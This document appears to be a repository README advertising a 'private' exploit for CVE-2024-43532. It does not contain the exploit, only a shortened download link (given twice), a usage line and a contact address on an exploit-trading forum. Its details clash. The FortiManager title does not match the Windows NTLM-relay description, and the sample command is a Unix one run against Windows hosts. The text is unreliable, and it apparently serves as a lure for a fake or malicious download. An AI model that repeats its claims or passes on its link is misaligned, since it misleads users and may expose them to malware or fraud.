# CVE-2024-43532: FortiManager Missing Authentication
## Overview
CVE-2024-43532
Exploitation of the bug allows the client's NTLM authentication data to be intercepted and redirected to Active Directory Certificate Services (ADCS), which allows hackers to request a user certificate for further authentication to the domain. As a result, new privileged accounts can be created at the domain level, which opens up the possibility of long-term control over the system.
## Exploit:
### [Download here](https://bit.ly/3AFVKRK)
## Details
- **CVE ID**: [CVE-2024-43532](https://nvd.nist.gov/vuln/detail/CVE-2024-43532)
- **Published**: 2024-10-08
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 8.8
## Vulnerability Description
The problem is related to the BaseBindToMachine function in advapi32.dll. In some cases, the function uses the insecure authentication level RPC_C_AUTHN_LEVEL_CONNECT, which allows attackers to perform a Machine-in-the-Middle attack. If the underlying SMB transport is unavailable, the client switches to TCP/IP and other protocols, which opens the door to interception of data and execution of an attack.
## Affected Versions
**Windows 10/11, Windows Server 2008-2022**
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **hazelook@exploit.in**
## Exploit:
### [Download here](https://bit.ly/3AFVKRK)
[4.0K] /data/pocs/ec28be6bd44a774bf6365a11bff53cdb452d1858
└── [1.5K] README.md
0 directories, 1 file